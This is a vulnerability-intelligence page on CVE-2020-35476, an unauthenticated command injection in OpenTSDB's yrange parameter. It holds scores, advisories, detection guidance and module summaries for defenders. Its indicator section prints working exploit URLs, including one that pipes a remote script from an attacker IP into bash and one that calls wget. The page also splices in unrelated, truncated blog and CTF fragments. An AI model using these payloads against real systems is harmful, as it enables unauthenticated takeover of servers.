CVE-2020-35476
published 2020-12-16CVE-2020-35476: A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
85.33%
99.7th percentile
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| opentsdb | opentsdb | <= 2.4.0 | — |
| opentsdb | opentsdb | 1.0.0 – 2.4.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json↗
url/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json↗
urlhttp://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json↗
- →Detect exploitation attempts by matching HTTP GET requests to the OpenTSDB /q endpoint containing 'yrange' parameter with 'system(' substring, indicating OS command injection. ↗
- →Alert on HTTP responses from OpenTSDB /q endpoint containing all three of: 'plotted', 'timing', and 'cachehit' in the JSON body, which confirms successful graph rendering triggered by the exploit request. ↗
- →The Metasploit module first queries the OpenTSDB version API before exploitation; monitor for sequential requests to the OpenTSDB version/API endpoint followed by a /q request with a yrange parameter containing bracket-enclosed system() calls. ↗
- →The injected command in yrange uses the pattern [33:system('...')] — look for URL-encoded or plaintext occurrences of 'system(' within the yrange query parameter of requests to /q. ↗
- →CVE-2020-35476 is an incomplete fix; regex validation on the query API can be bypassed. Inspect all parameters of the legacy HTTP query API (/q), not just yrange, for crafted OS command injection patterns. ↗
- ·The vulnerability is exploitable without authentication; no credentials are required to trigger the yrange command injection via the /q HTTP API endpoint. ↗
- ·The original CVE-2020-35476 fix was incomplete; a bypass (tracked separately) exists where crafted commands evade the regex validation added to the query API. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Command injection in OpenTSDB
osv·2023-05-03·CVSS 9.8
CVE-2023-25826 [CRITICAL] Command injection in OpenTSDB
Command injection in OpenTSDB
Due to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.
GHSA
Command injection in OpenTSDB
ghsa·2023-05-03·CVSS 9.8
CVE-2023-25826 [CRITICAL] CWE-78 Command injection in OpenTSDB
Command injection in OpenTSDB
Due to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.
OSV
OS Command Injection in OpenTSDB
osv·2021-08-02
CVE-2020-35476 [CRITICAL] OS Command Injection in OpenTSDB
OS Command Injection in OpenTSDB
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
GHSA
OS Command Injection in OpenTSDB
ghsa·2021-08-02
CVE-2020-35476 [CRITICAL] CWE-78 OS Command Injection in OpenTSDB
OS Command Injection in OpenTSDB
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
VulnCheck
opentsdb opentsdb Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-35476 [CRITICAL] opentsdb opentsdb Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
opentsdb opentsdb Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
Affected: opentsdb opentsdb
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-21&host_type=src&vulnerability=
No detection rules found.
Nuclei
OpenTSDB <=2.4.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2020-35476 [CRITICAL] OpenTSDB <=2.4.0 - Remote Code Execution
OpenTSDB <=2.4.0 - Remote Code Execution
OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2020-35476
info:
name: OpenTSDB <=2.4.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: |
OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact
Metasploit
OpenTSDB 2.4.0 unauthenticated command injection
metasploit·CVSS 9.8
CVE-2020-35476 [CRITICAL] OpenTSDB 2.4.0 unauthenticated command injection
OpenTSDB 2.4.0 unauthenticated command injection
This module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0.
Fortinet
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
blogs_fortinet·2022-10-21·CVSS 9.8
CVE-2022-22954 [CRITICAL] Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
By Cara Lin | October 21, 2022
In April, VMware patched a vulnerability CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published Threat Signal Report about it and also developed IPS signature in April.
We observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc. But in August, there were a few particular payloads, which got our interest. They had th
Tenable
Identifying Server Side Request Forgery: How Tenable.io Web Application Scanning Can Help
blogs_tenable·2021-11-18
Identifying Server Side Request Forgery: How Tenable.io Web Application Scanning Can Help
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
CTF
AdmirerToo / README
ctf_writeups·CVSS 9.8
CVE-2021-21311 [CRITICAL] AdmirerToo / README
# AdmirerToo - HackTheBox - Writeup
Linux, 40 Base Points, Hard
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```.
***User***: By reading the HTML source of ```403``` pages we found vhost ```admirer-gallery.htb```, Found ```Adminer``` on ```db.admirer-gallery.htb```, Found Admier SSRF (```CVE-2021-21311```), Using the SSRF we access to internal port ```4242``` and found that is ```openTSDB```, Using ```CVE-2020-35476``` we get RCE and we get a reverse shell as ```opentsb``` user, Enumerate and found ```/var/www/adminer/plugins/data/servers.php``` which contains the password of ```jennifer``` user.
***Root***: Found ```fail2ban``` and ```openCATS``` running of the target machine on port ```8080```,
2020-12-16
Published
Exploited in the wild